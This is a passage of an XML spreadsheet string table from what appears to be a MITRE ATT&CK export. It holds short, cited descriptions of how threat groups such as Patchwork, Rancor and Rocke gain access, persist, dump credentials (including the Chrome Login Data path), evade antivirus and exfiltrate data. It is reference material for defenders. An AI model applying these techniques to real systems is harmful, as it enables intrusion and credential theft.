    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has used various methods of process injection including hot patching.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--ca429946-3c81-4773-8254-108dbdbb9da9</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has sent spearphishing emails with attachments to victims as its primary initial access vector.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--e797fcd8-4ad6-43d3-a36a-3c05d0ce8832</t>
  </si>
  <si>
    <t>[POLONIUM](https://attack.mitre.org/groups/G1005) has used OneDrive and DropBox for C2.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--322fcce0-fe46-48f2-b57c-01b73b316339</t>
  </si>
  <si>
    <t xml:space="preserve">[POLONIUM](https://attack.mitre.org/groups/G1005) has exfiltrated stolen data to [POLONIUM](https://attack.mitre.org/groups/G1005)-owned OneDrive and Dropbox accounts.(Citation: Microsoft POLONIUM June 2022) </t>
  </si>
  <si>
    <t>relationship--3077e0e6-4540-4f0d-a2ec-c4db78a35a0e</t>
  </si>
  <si>
    <t>[POLONIUM](https://attack.mitre.org/groups/G1005) has used the AirVPN service for operational activity.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--81eaf78c-2282-4e86-baa9-820020a54031</t>
  </si>
  <si>
    <t xml:space="preserve">[POLONIUM](https://attack.mitre.org/groups/G1005) has obtained and used tools such as AirVPN and plink in their operations.(Citation: Microsoft POLONIUM June 2022) </t>
  </si>
  <si>
    <t>relationship--84a7d204-857f-43dd-8876-215b7a946ed1</t>
  </si>
  <si>
    <t>[POLONIUM](https://attack.mitre.org/groups/G1005) has used compromised credentials from an IT company to target downstream customers including a law firm and aviation company.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--b0e3680e-6099-4f33-a45e-5e938a7e7085</t>
  </si>
  <si>
    <t>05 July 2022</t>
  </si>
  <si>
    <t>[POLONIUM](https://attack.mitre.org/groups/G1005) has used valid compromised credentials to gain access to victim environments.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--e145eb03-1e0b-4062-ab24-20269e3e85d0</t>
  </si>
  <si>
    <t>[POLONIUM](https://attack.mitre.org/groups/G1005) has created and used legitimate Microsoft OneDrive accounts for their operations.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--ba747d29-53c9-4841-bbbe-93527c789e63</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has signed code with self-signed certificates.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--b2f7a2e7-5a72-4ace-b1de-121a8db809d8</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created self-signed certificates to sign malicious installers.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--4ac5b593-8f47-46cc-9af3-fcb0eb20f66e</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created self-signed digital certificates for use in HTTPS C2 traffic.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--66e5238f-c1f7-4094-8c2e-e8e41a4c12f3</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has used watering hole attacks to deliver malicious versions of legitimate installers.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--e898946c-2c9d-4bf4-9253-67acfadc5b0a</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created admin accounts on a compromised host.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--56e4bdb5-a57a-463a-a396-7bed2eb6893e</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</si>
  <si>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</si>
  <si>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relationship--49be75c9-8484-492e-9ebc-f81d2e203e4e</t>
  </si>
  <si>
    <t>30 July 2020</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has named services to appear legitimate.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--a5b0b3ae-737a-4f2b-bbe9-23ca214eb733</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has disguised malicious installer files by bundling them with legitimate software installers.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--92348457-3761-4298-aedc-14fa7fd4810c</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--b92d6b45-e211-4168-ac32-80427bf1b9d2</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has used Registry run keys to establish persistence.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--788d02cb-7a20-4115-9428-b55e598374ce</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created new services and modified existing services for persistence.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>relationship--875a622a-445e-46fe-8959-8d205c88c728</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) encrypted the collected files' path with AES and then encoded them with base64.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--03b18e87-f5f2-4d12-b5b3-2e1ba131b091</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</si>
  <si>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</si>
  <si>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relationship--b0a0e3c7-e1b2-4b84-8e37-8989147785d0</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has used BITS jobs to download malicious payloads.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--19cc1620-de41-4076-b5b8-9d64364a578a</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) apparently altered [NDiskMonitor](https://attack.mitre.org/software/S0272) samples by adding four bytes of random letters in a likely attempt to change the file hashes.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--c6a4b8e6-eaf7-4b56-af0a-ba0fd070e97b</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) bypassed User Access Control (UAC).(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>relationship--d16d59aa-f056-4cc7-9f67-0e80db9cdacb</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has signed malware with self-signed certificates from fictitious and spoofed legitimate software companies.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--1576ad32-c7cc-45af-b39e-410d96a6f908</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--9319fb2f-88df-4195-a42e-2a6a983a4840</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has obfuscated a script with Crypto Obfuscator.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--5c75f4e0-27ab-45d0-b8bc-3991137bdb87</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) dumped the login data database from &lt;code&gt;\AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;.(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>relationship--1df7df54-c4c1-49f0-a0c3-11102db44f2c</t>
  </si>
  <si>
    <t>A [Patchwork](https://attack.mitre.org/groups/G0040) .dll that contains [BADNEWS](https://attack.mitre.org/software/S0128) is loaded and executed using DLL side-loading.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--174698f8-9349-4e52-9887-18089038195c</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) collected and exfiltrated files from the infected system.(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>relationship--8e28cc53-3fd4-42ed-8516-71fd9ee57641</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.(Citation: Securelist Dropping Elephant)</t>
  </si>
  <si>
    <t>relationship--b3a9c32f-c6d0-46d4-8936-dd4fec61d305</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has used watering holes to deliver files with exploits to initial victims.(Citation: Symantec Patchwork)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--62fd473e-e045-4a47-828a-ab5ee7b4fcf0</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) leveraged the DDE protocol to deliver their malware.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--f7a4bc28-8f50-4e9e-9986-b71f21528967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</si>
  <si>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</si>
  <si>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relationship--74316a28-d1a6-40b8-8c49-836f06e90e02</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) removed certain files and replaced them so they could not be retrieved.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--a58cbb63-024b-4b78-8dad-4661ee445212</t>
  </si>
  <si>
    <t>A [Patchwork](https://attack.mitre.org/groups/G0040) payload has searched all fixed drives on the victim for files matching a specified list of extensions.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--0e89ca75-b73e-476e-b56d-1cf815fa7868</t>
  </si>
  <si>
    <t>relationship--1a273c5c-b362-4126-b684-7751b85cbf5c</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) payloads download additional files from the C2 server.(Citation: Securelist Dropping Elephant)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--da734f6c-de0d-44f1-9521-6607b800ad43</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) copied all targeted files to a directory called index that was eventually uploaded to the C&amp;C server.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--40082714-cb19-482f-9b6d-22031ef39926</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) embedded a malicious macro in a Word document and lured the victim to click on an icon to execute the malware.(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--9015a88f-9442-41cb-8486-046b76cddc5d</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</si>
  <si>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</si>
  <si>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relationship--67154159-cd44-4d9c-ae84-c82a8cd5ee58</t>
  </si>
  <si>
    <t>03 July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</si>
  <si>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</si>
  <si>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relationship--42d4ae64-75da-4dfd-b23f-d270252115ee</t>
  </si>
  <si>
    <t>A [Patchwork](https://attack.mitre.org/groups/G0040) payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--1770cc28-c49c-4b70-b4d0-6976efaede16</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) used [PowerSploit](https://attack.mitre.org/software/S0194) to download payloads, run a reverse shell, and execute malware on the victim's machine.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--d6e43621-ca4a-475f-b81c-037a0878728b</t>
  </si>
  <si>
    <t>A [Patchwork](https://attack.mitre.org/groups/G0040) payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe.(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>relationship--28139c5b-be96-44d2-8e54-425311d108d6</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</si>
  <si>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</si>
  <si>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relationship--3f954be4-205c-4cec-92f9-36715e204a49</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) attempted to use RDP to move laterally.(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>relationship--2816f512-1a04-4cf8-94e9-36720b949c76</t>
  </si>
  <si>
    <t>A [Patchwork](https://attack.mitre.org/groups/G0040) file stealer can run a TaskScheduler DLL to add persistence.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--1e666715-f087-44ad-aaa5-d22fbda42fba</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) scanned the “Program Files” directories for a directory with the string “Total Security” (the installation path of the “360 Total Security” antivirus tool).(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>relationship--6a5bc2dd-2132-4af0-9b12-0e781971d96c</t>
  </si>
  <si>
    <t>A [Patchwork](https://attack.mitre.org/groups/G0040) payload was packed with UPX.(Citation: Securelist Dropping Elephant)</t>
  </si>
  <si>
    <t>relationship--891a97f1-d3e2-45ff-a079-43dcad21a175</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</si>
  <si>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</si>
  <si>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relationship--5b63f8fd-efc7-454f-b466-d5e0a525f64f</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with links to deliver files with exploits to initial victims.(Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--e35a6a79-0ffc-4835-aaf8-e42dd20a7e45</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has used embedded image tags (known as web bugs) with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--d9b4a18a-955a-4ef8-93b2-61db23e59b75</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) used Base64 to encode C2 traffic.(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>relationship--21caad94-1568-4e40-8e38-c0f7e854aede</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</si>
  <si>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</si>
  <si>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relationship--e8068ad2-97b3-4693-a6ad-a8ee9a272890</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) collected the victim username and whether it was running as admin, then sent the information to its C2 server.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--8bb44b86-379d-49ba-9b28-2451e69db30d</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) has obtained and used open-source tools such as [QuasarRAT](https://attack.mitre.org/software/S0262).(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--5eba2b01-da0d-4340-816b-16a4f3cc8ba6</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) used Visual Basic Scripts (VBS) on victim machines.(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--01d1922c-6900-4ed3-8ddf-bae4d06296b3</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</si>
  <si>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</si>
  <si>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relationship--c5da001c-2c17-4e83-8e5c-21863ead4bd9</t>
  </si>
  <si>
    <t>[PittyTiger](https://attack.mitre.org/groups/G0011) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002) and [gsecdump](https://attack.mitre.org/software/S0008).(Citation: Bizeul 2014)</t>
  </si>
  <si>
    <t>relationship--86169d65-b154-402d-918c-4b4602d71cd0</t>
  </si>
  <si>
    <t>[PittyTiger](https://attack.mitre.org/groups/G0011) attempts to obtain legitimate credentials during operations.(Citation: Bizeul 2014)</t>
  </si>
  <si>
    <t>relationship--93b12e1a-7f21-4fa0-9b2a-c96c7c270625</t>
  </si>
  <si>
    <t>G0033</t>
  </si>
  <si>
    <t>Poseidon Group</t>
  </si>
  <si>
    <t>intrusion-set--7ecc3b4f-5cdb-457e-b55a-df376b359446</t>
  </si>
  <si>
    <t>[Poseidon Group](https://attack.mitre.org/groups/G0033) searches for administrator accounts on both the local victim machine and the network.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>relationship--a602be33-6ed6-4f73-b7f6-10b47581707a</t>
  </si>
  <si>
    <t>relationship--b93cfd4f-113c-4769-81c9-e710ed0b5f4e</t>
  </si>
  <si>
    <t>[Poseidon Group](https://attack.mitre.org/groups/G0033) tools attempt to spoof anti-virus processes as a means of self-defense.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>relationship--df69c29c-01c4-4541-988e-8a5765439d56</t>
  </si>
  <si>
    <t>[Poseidon Group](https://attack.mitre.org/groups/G0033) conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>relationship--35aac341-5371-42e8-ad93-3ab94a11b51a</t>
  </si>
  <si>
    <t>The [Poseidon Group](https://attack.mitre.org/groups/G0033)'s Information Gathering Tool (IGT) includes PowerShell components.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>relationship--e2ce90d2-7470-4f2d-a86c-f429b934ab35</t>
  </si>
  <si>
    <t>After compromising a victim, [Poseidon Group](https://attack.mitre.org/groups/G0033) lists all running processes.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>relationship--c6f81350-a410-4ac7-a4b0-58bd4a9c1d9e</t>
  </si>
  <si>
    <t>[Poseidon Group](https://attack.mitre.org/groups/G0033) obtains and saves information about victim network interfaces and addresses.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>relationship--21ff06b5-022f-40bf-821b-3e08dc9f08a3</t>
  </si>
  <si>
    <t>After compromising a victim, [Poseidon Group](https://attack.mitre.org/groups/G0033) discovers all running services.(Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>relationship--720be590-5ea0-43b6-8360-fa75dd4d1a67</t>
  </si>
  <si>
    <t>Malware used by [Putter Panda](https://attack.mitre.org/groups/G0024) attempts to terminate processes corresponding to two components of Sophos Anti-Virus (SAVAdminService.exe and SavService.exe).(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--94211067-148f-4196-a216-c1bb1e5cfc70</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</si>
  <si>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</si>
  <si>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relationship--a442fcac-55d7-49ff-8ecf-ca61885c27e2</t>
  </si>
  <si>
    <t>Droppers used by [Putter Panda](https://attack.mitre.org/groups/G0024) use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 – 0xAF to obfuscate payloads.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--c952f284-e529-481f-97fb-7a6e14c25ccf</t>
  </si>
  <si>
    <t>A dropper used by [Putter Panda](https://attack.mitre.org/groups/G0024) installs itself into the ASEP Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; with a value named McUpdate.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--55120727-0b7f-4d6a-a881-d17bdc9c85ba</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) has used search order hijacking to force TeamViewer to load a malicious DLL.(Citation: Group IB RTM August 2019)</t>
  </si>
  <si>
    <t>relationship--16dfd169-264f-410f-97bf-a1cdec20c50e</t>
  </si>
  <si>
    <t>11 May 2020</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) has used an RSS feed on Livejournal to update a list of encrypted C2 server names.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--a58ad2d1-7200-4ba8-9c24-fc640306ea2f</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) has distributed its malware via the RIG and SUNDOWN exploit kits, as well as online advertising network &lt;code&gt;Yandex.Direct&lt;/code&gt;.(Citation: ESET RTM Feb 2017)(Citation: ESET Buhtrap and Buran April 2019)</t>
  </si>
  <si>
    <t>relationship--03e67769-31da-4a46-a5a6-1ccbdd0cf29f</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) has attempted to lure victims into opening e-mail attachments to execute malicious code.(Citation: Group IB RTM August 2019)</t>
  </si>
  <si>
    <t>relationship--1bf08293-5342-4736-b3a9-c1f160ad9c81</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</si>
  <si>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</si>
  <si>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relationship--09381138-b93b-4b0d-b82d-c21d452ff514</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) has used a modified version of TeamViewer and Remote Utilities for remote access.(Citation: Group IB RTM August 2019)</t>
  </si>
  <si>
    <t>relationship--685a8409-db59-4ef3-b4de-786b87be8839</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) has used spearphishing attachments to distribute its malware.(Citation: Group IB RTM August 2019)</t>
  </si>
  <si>
    <t>relationship--5f1493e8-65d8-474a-b6b7-c1311fc24d98</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) has downloaded additional malware, including by using [certutil](https://attack.mitre.org/software/S0160).(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--74a15877-d310-4be1-813d-4ee9cbd603b7</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--503c4b74-7ca5-45e3-bb11-85a99ca1810f</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) has used &lt;code&gt;msiexec&lt;/code&gt; to download and execute malicious installer files over HTTP.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--c551c942-a191-4fe9-81a3-cc795d7dea38</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) launched a scheduled task to gain persistence using the &lt;code&gt;schtasks /create /sc&lt;/code&gt; command.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--7121357f-cc91-4e6b-a2a6-d8bb51bf4a01</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) has attached a malicious document to an email to gain initial access.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--ebed8156-bce1-4710-bd99-7cdcfa887d28</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) has used VBS scripts as well as embedded macros for execution.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--2466dc21-d32d-4a62-a815-8f1d5d09d88d</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) has used HTTP for C2.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--0a975ec6-5754-4a42-aa0f-f468d67a2c91</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) has used cmd.exe to execute commmands.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--e9d48406-947c-4d50-9539-b30c4566403b</t>
  </si>
  <si>
    <t>G0106</t>
  </si>
  <si>
    <t>Rocke</t>
  </si>
  <si>
    <t>intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) issued wget requests from infected systems to the C2.(Citation: Talos Rocke August 2018)</t>
  </si>
  <si>
    <t>relationship--37327da8-efd3-48c0-9f91-38f384f8579e</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has installed an "init.d" startup script to maintain persistence.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>relationship--6b1cc49f-8d94-4f59-a723-2a70c3edf760</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has cleared log files within the /var/log/ folder.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>relationship--93b62fc4-f024-4482-9ea1-041bc3d29bfd</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>relationship--47440b3d-e6ef-4f7d-b732-453d1684424a</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) installed a cron job that downloaded and executed files from the C2.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>relationship--49a68076-c596-412d-a8af-3e238dfef960</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>relationship--674031ea-4fff-4669-b44b-d289fa1cc36e</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has extracted tar.gz files after downloading them from a C2 server.(Citation: Talos Rocke August 2018)</t>
  </si>
  <si>
    <t>relationship--c8fdab57-1e10-4f66-a1de-59a876c99ab1</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.(Citation: Talos Rocke August 2018)	</t>
  </si>
  <si>
    <t>relationship--30d1528d-6a50-47b2-ab5c-eb9074adc716</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)</t>
  </si>
  <si>
    <t>relationship--ca1afca5-2f16-497e-bfff-1564706e05f2</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>relationship--47b95300-a51c-4d91-9bbe-e40956df2081</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)</t>
  </si>
  <si>
    <t>relationship--06508c23-746d-4894-b414-cff925692bd5</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has deleted files on infected machines.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>relationship--dec705fd-139b-49d6-b0d8-888b2b922a12</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) downloaded a file "libprocesshider", which could hide files on the target system.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)</t>
  </si>
  <si>
    <t>relationship--48141016-3fc6-46af-9f93-b52439ed78ea</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) used malware to download additional malicious files to the target system.(Citation: Talos Rocke August 2018)	</t>
  </si>
  <si>
    <t>relationship--3e039f64-08da-4bb3-b8d5-1ed6428980ac</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) has changed file permissions of files so they could not be modified.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>relationship--a2f88508-4177-4294-b287-6a3494f6e738</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has used shell scripts which download mining executables and saves them with the filename "java".(Citation: Talos Rocke August 2018)</t>
  </si>
  <si>
    <t>relationship--ff438715-ffa8-4fa2-a69e-7126dd60bfb3</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers.(Citation: Talos Rocke August 2018)(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>relationship--5d8e9a49-f534-4cb6-9e3e-aebacb3c1dd0</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106)'s miner connects to a C2 server using port 51640.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>relationship--f7f947cd-6e0c-499c-8cdf-293e38657e31</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has modified UPX headers after packing files to break unpackers.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>relationship--277971c7-d42e-497f-8df4-be5b4bc094f8</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106)'s miner, "TermsHost.exe", evaded defenses by injecting itself into Windows processes, including Notepad.exe.(Citation: Talos Rocke August 2018)	</t>
  </si>
  <si>
    <t>relationship--5de38b67-dbc7-46bf-bb73-91cd0e069d05</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) has used SSH private keys on the infected machine to spread its coinminer throughout a network.(Citation: Anomali Rocke March 2019)</t>
  </si>
  <si>
    <t>relationship--de8fefef-bfe7-4720-a443-66713a47b439</t>
  </si>
  <si>
    <t xml:space="preserve">[Rocke](https://attack.mitre.org/groups/G0106) can detect a running process's PID on the infected machine.(Citation: Anomali Rocke March 2019)	</t>
  </si>
  <si>
    <t>relationship--a3d2ef4a-2bca-482d-897b-99da14b16b52</t>
  </si>
  <si>
